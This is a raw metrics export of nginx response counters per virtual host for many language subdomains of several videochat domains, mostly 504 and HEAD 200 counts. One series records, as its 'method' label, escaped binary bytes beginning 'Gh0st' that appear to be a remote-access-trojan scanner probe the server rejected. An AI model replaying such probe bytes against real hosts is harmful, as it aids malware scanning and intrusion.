nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="mg.videochat.tv.br"} 65 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="mg.videochat.world"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="mi.videochat.cafe"} 128 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="mi.videochat.date"} 121 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="mi.videochat.mx"} 14 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="mi.videochat.tv.br"} 74 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="mi.videochat.world"} 7 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="mk.videochat.cafe"} 158 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="mk.videochat.date"} 80 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="mk.videochat.mx"} 18 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="mk.videochat.show"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="mk.videochat.tv.br"} 64 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="mk.videochat.world"} 7 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="ml.videochat.cafe"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="ml.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="mn.videochat.cafe"} 137 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="mn.videochat.date"} 105 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="mn.videochat.mx"} 24 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="mn.videochat.tv.br"} 68 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="mn.videochat.world"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="mr.videochat.cafe"} 13 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="mr.videochat.date"} 19 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="mr.videochat.mx"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="mr.videochat.tv.br"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="mrj.videochat.cafe"} 95 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="mrj.videochat.date"} 74 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="mrj.videochat.mx"} 20 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="mrj.videochat.show"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="mrj.videochat.tv.br"} 83 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="mrj.videochat.world"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="ms.videochat.cafe"} 152 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="ms.videochat.date"} 48 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="ms.videochat.mx"} 13 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="ms.videochat.show"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="ms.videochat.tv.br"} 60 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="ms.videochat.world"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="mt.videochat.cafe"} 157 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="mt.videochat.date"} 115 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="mt.videochat.mx"} 15 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="mt.videochat.tv.br"} 91 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="mt.videochat.world"} 8 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="my.videochat.cafe"} 11 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="my.videochat.date"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="my.videochat.mx"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="my.videochat.tv.br"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="ne.videochat.cafe"} 14 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="ne.videochat.mx"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="ne.videochat.tv.br"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="ne.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="nl.videochat.cafe"} 99 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="nl.videochat.date"} 77 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="nl.videochat.mx"} 15 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="nl.videochat.tv.br"} 68 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="no.videochat.cafe"} 185 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="no.videochat.date"} 147 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="no.videochat.mx"} 15 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="no.videochat.tv.br"} 60 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="no.videochat.world"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="pa.videochat.cafe"} 11 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="pa.videochat.date"} 7 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="pa.videochat.tv.br"} 17 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="pa.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="pap.videochat.cafe"} 99 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="pap.videochat.date"} 36 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="pap.videochat.mx"} 15 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="pap.videochat.tv.br"} 29 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="pap.videochat.world"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="pl.videochat.cafe"} 141 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="pl.videochat.date"} 144 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="pl.videochat.mx"} 12 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="pl.videochat.tv.br"} 71 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="pl.videochat.world"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="pt.videochat.cafe"} 186 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="pt.videochat.date"} 133 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="pt.videochat.mx"} 17 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="pt.videochat.world"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="ro.videochat.cafe"} 134 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="ro.videochat.date"} 78 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="ro.videochat.mx"} 13 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="ro.videochat.tv.br"} 65 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="sco.videochat.cafe"} 160 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="sco.videochat.date"} 49 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="sco.videochat.mx"} 16 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="sco.videochat.tv.br"} 71 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="si.videochat.cafe"} 17 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="si.videochat.date"} 32 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="si.videochat.mx"} 16 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="si.videochat.show"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="si.videochat.tv.br"} 13 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="si.videochat.world"} 7 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="sk.videochat.cafe"} 164 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="sk.videochat.date"} 106 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="sk.videochat.mx"} 16 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="sk.videochat.tv.br"} 68 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="sk.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="sl.videochat.cafe"} 159 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="sl.videochat.date"} 73 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="sl.videochat.mx"} 13 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="sl.videochat.tv.br"} 80 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="sl.videochat.world"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="sr.videochat.cafe"} 164 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="sr.videochat.date"} 133 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="sr.videochat.mx"} 17 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="sr.videochat.tv.br"} 104 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="sr.videochat.world"} 27 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="su.videochat.cafe"} 168 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="su.videochat.date"} 99 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="su.videochat.mx"} 15 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="su.videochat.tv.br"} 73 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="sv.videochat.cafe"} 180 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="sv.videochat.date"} 153 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="sv.videochat.mx"} 16 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="sv.videochat.tv.br"} 56 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="sv.videochat.world"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="sw.videochat.cafe"} 129 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="sw.videochat.date"} 123 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="sw.videochat.mx"} 18 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="sw.videochat.tv.br"} 82 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="sw.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="ta.videochat.cafe"} 9 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="ta.videochat.date"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="ta.videochat.mx"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="ta.videochat.tv.br"} 14 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="ta.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="te.videochat.cafe"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="te.videochat.date"} 8 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="te.videochat.mx"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="te.videochat.show"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="te.videochat.tv.br"} 17 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="te.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="tg.videochat.cafe"} 121 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="tg.videochat.date"} 84 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="tg.videochat.mx"} 19 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="tg.videochat.show"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="tg.videochat.tv.br"} 51 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="tg.videochat.world"} 12 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="th.videochat.cafe"} 11 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="th.videochat.date"} 20 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="th.videochat.tv.br"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="th.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="tl.videochat.cafe"} 149 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="tl.videochat.date"} 128 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="tl.videochat.mx"} 15 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="tl.videochat.tv.br"} 74 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="tl.videochat.world"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="tr.videochat.cafe"} 101 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="tr.videochat.date"} 129 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="tr.videochat.mx"} 14 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="tr.videochat.tv.br"} 102 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="tr.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="tt.videochat.cafe"} 149 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="tt.videochat.date"} 150 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="tt.videochat.mx"} 16 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="tt.videochat.tv.br"} 95 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="tt.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="udm.videochat.cafe"} 181 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="udm.videochat.date"} 74 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="udm.videochat.mx"} 15 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="udm.videochat.tv.br"} 103 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="udm.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="uk.videochat.cafe"} 127 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="uk.videochat.date"} 137 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="uk.videochat.mx"} 21 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="uk.videochat.show"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="uk.videochat.tv.br"} 49 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="uk.videochat.world"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="ur.videochat.cafe"} 9 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="ur.videochat.date"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="ur.videochat.mx"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="ur.videochat.tv.br"} 8 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="ur.videochat.world"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="uz.videochat.cafe"} 103 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="uz.videochat.date"} 90 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="uz.videochat.mx"} 11 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="uz.videochat.tv.br"} 112 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="vi.videochat.cafe"} 134 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="vi.videochat.date"} 105 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="vi.videochat.mx"} 14 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="vi.videochat.tv.br"} 84 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="vi.videochat.world"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="videochat.cafe"} 191 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="videochat.date"} 98 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="videochat.mx"} 310 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="videochat.tv.br"} 109 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="videochat.world"} 46 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="xh.videochat.cafe"} 157 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="xh.videochat.date"} 124 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="xh.videochat.mx"} 12 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="xh.videochat.tv.br"} 71 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="xh.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="yi.videochat.date"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="yi.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="yi.videochat.tv.br"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="yi.videochat.world"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="zh.videochat.cafe"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="zh.videochat.mx"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="zh.videochat.tv.br"} 7 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="504",vhost="zh.videochat.world"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="Get",status="400",vhost="-"} 7 nginx_http_response_count_total{app="web",host="161.97.120.25",method="Gh0st\\xAD\\x00\\x00\\x00\\xE0\\x00\\x00\\x00x\\x9CKS``\\x98\\xC3\\xC0\\xC0\\xC0\\x06\\xC4\\x8C@\\xBCQ\\x96\\x81\\x81\\x09H\\x07\\xA7\\x16\\x95e&\\xA7*\\x04$&g+\\x182\\x94\\xF6\\xB000\\xAC\\xA8rc\\x00\\x01\\x11\\xA0\\x82\\x1F\\x5C`&\\x83\\xC7K7\\x86\\x19\\xE5n\\x0C9\\x95n\\x0C;\\x84\\x0F3\\xAC\\xE8sch\\xA8^\\xCF4'J\\x97\\xA9\\x82\\xE30\\xC3\\x91h]&\\x90\\xF8\\xCE\\x97S\\xCBA4L?2=\\xE1\\xC4\\x92\\x86\\x0B@\\xF5`\\x0CT\\x1F\\xAE\\xAF]",status="400",vhost="-"} 21 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="af.videochat.cafe"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="af.videochat.date"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="af.videochat.mx"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="af.videochat.tv.br"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="af.videochat.world"} 8 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="al.videochat.cafe"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="al.videochat.date"} 7 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="al.videochat.mx"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="al.videochat.tv.br"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="al.videochat.world"} 7 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="am.videochat.cafe"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="am.videochat.date"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="am.videochat.mx"} 55 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="am.videochat.tv.br"} 52 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="am.videochat.world"} 58 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="ar.videochat.cafe"} 10 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="ar.videochat.date"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="ar.videochat.mx"} 13 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="ar.videochat.tv.br"} 33 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="ar.videochat.world"} 10 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="az.videochat.cafe"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="az.videochat.date"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="az.videochat.mx"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="az.videochat.tv.br"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="az.videochat.world"} 7 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="ba.videochat.cafe"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="ba.videochat.date"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="ba.videochat.mx"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="ba.videochat.tv.br"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="ba.videochat.world"} 7 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="be.videochat.cafe"} 8 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="be.videochat.date"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="be.videochat.mx"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="be.videochat.tv.br"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="be.videochat.world"} 7 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="bg.videochat.cafe"} 56 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="bg.videochat.date"} 7 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="bg.videochat.mx"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="bg.videochat.tv.br"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="bg.videochat.world"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="bn.videochat.cafe"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="bn.videochat.date"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="bn.videochat.mx"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="bn.videochat.tv.br"} 52 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="bn.videochat.world"} 9 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="bs.videochat.cafe"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="bs.videochat.date"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="bs.videochat.mx"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="bs.videochat.tv.br"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="bs.videochat.world"} 10 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="ca.videochat.cafe"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="ca.videochat.mx"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="ca.videochat.tv.br"} 7 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="ca.videochat.world"} 8 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="ceb.videochat.cafe"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="ceb.videochat.date"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="ceb.videochat.mx"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="ceb.videochat.tv.br"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="ceb.videochat.world"} 9 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="chm.videochat.cafe"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="chm.videochat.date"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="chm.videochat.mx"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="chm.videochat.tv.br"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="chm.videochat.world"} 7 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="cs.videochat.cafe"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="cs.videochat.date"} 9 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="cs.videochat.mx"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="cs.videochat.tv.br"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="cs.videochat.world"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="cy.videochat.cafe"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="cy.videochat.mx"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="cy.videochat.tv.br"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="200",vhost="cy.videochat.world"} 57 